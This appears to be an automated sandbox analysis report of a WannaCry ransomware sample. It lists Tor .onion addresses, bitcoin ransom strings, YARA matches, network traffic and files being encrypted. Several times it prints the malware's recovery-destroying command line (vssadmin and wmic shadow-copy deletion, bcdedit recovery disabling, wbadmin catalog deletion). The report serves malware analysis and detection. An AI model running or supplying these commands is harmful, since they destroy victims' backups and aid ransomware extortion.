                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616025428.0000000000198000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2976902245.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: Joe Sandbox ViewIP Address: 171.25.193.9 171.25.193.9
                  Source: global trafficTCP traffic: 192.168.11.20:49850 -> 18.18.82.18:9001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.130.11.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: @WanaDecryptor@.exeString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
                  Source: @WanaDecryptor@.exe, 00000019.00000003.2894051927.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000003.2893794519.00000000027B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
                  Source: taskhsvc.exe, 0000001E.00000003.2944209026.0000000003428000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001E.00000003.2953031017.000000000446D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://386bsd.net
                  Source: @WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
                  Source: @WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
                  Source: @WanaDecryptor@.exeString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616025428.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip(B
                  Source: @WanaDecryptor@.exeString found in binary or memory: https://www.google.com/search?q=how
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040DB80 recv,25_2_0040DB80
                  Source: unknownHTTPS traffic detected: 92.205.17.93:443 -> 192.168.11.20:49825 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.205.17.93:443 -> 192.168.11.20:49853 version: TLS 1.2
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,25_2_00407C30

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 1612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 2044, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!25_2_004020A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!29_2_004020A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!38_2_004020A0
                  Source: Yara matchFile source: 2N2jefqo8e.exe, type: SAMPLE
                  Source: Yara matchFile source: 29.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 38.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 50.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 50.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 38.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: 2N2jefqo8e.exe PID: 5208, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\Desktop\u.wnry, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe File moved: C:\Users\user\Desktop\PIVFAGEAAV.docx
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe File moved: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.jpg
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe File moved: C:\Users\user\Desktop\SQSJKEBWDT\JDDHMPCDUJ.mp3
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe File moved: C:\Users\user\Desktop\SQSJKEBWDT\SQSJKEBWDT.docx
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe File moved: C:\Users\user\Desktop\EEGWXUHVUG\NYMMPCEIMA.png
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99934763049Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT entropy: 7.99918368693Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99963681436Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001f.db.WNCRYT entropy: 7.99804613196Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db.WNCRYT entropy: 7.99767445731Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db.WNCRYT entropy: 7.99765936748Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99698431581Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99969307031Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRYT entropy: 7.9989785552Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.99746853163Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRYT entropy: 7.99567237592Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRYT entropy: 7.99704286853Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT entropy: 7.99635137947Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT entropy: 7.99559540668Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT entropy: 7.99855344588Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT entropy: 7.99991415295Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT entropy: 7.99800634193Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT entropy: 7.99945433021Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT entropy: 7.99101912097Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT entropy: 7.99617558904Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT entropy: 7.99459858157Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT entropy: 7.99995237145Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT entropy: 7.99920436324Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT entropy: 7.99937265604Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.99958793169Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552179353449.txt.WNCRYT entropy: 7.99850576109Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6d27d8af-3d9b-4d29-b5de-77687cff7d14}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99522443999Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000028.db.WNCRYT entropy: 7.9983176996Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552479439416.txt.WNCRYT entropy: 7.998558746Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552779536724.txt.WNCRYT entropy: 7.99837283771Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Intel\GCC\IGCCSvc.db.WNCRYT entropy: 7.99135687516Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.9980147884Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.WNCRYT entropy: 7.99987053054Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99971287808Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99967222941Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99977546025Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.99473321431Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT entropy: 7.99910140145Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99333074212Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT entropy: 7.99779266292Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.99999315711Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99931191891Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT entropy: 7.99788547196Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.99586984813Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99421120158Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.99864664469Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.99599632611Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT entropy: 7.99933673293Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99848498699Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT entropy: 7.9939302221Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99312041013Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT entropy: 7.99893393847Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99942155872Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT entropy: 7.99199540376Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT entropy: 7.99935266809Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99968216973Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.9997549636Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT entropy: 7.99969614412Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT entropy: 7.99993949878Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRYT entropy: 7.99867000213Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\IconCache.db.WNCRYT entropy: 7.99261037711Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRYT entropy: 7.99826523596Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99186300678Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551589314323.txt.WNCRYT entropy: 7.99812660004Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99984894849Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551879309585.txt.WNCRYT entropy: 7.99850242464Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT entropy: 7.99635513518Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210922101724.txt.WNCRYT entropy: 7.99954170606Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy) entropy: 7.99855344588Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552779536724.txt.WNCRY (copy) entropy: 7.99837283771Jump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,25_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 29_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,29_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 38_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,38_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: @WanaDecryptor@.exe Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
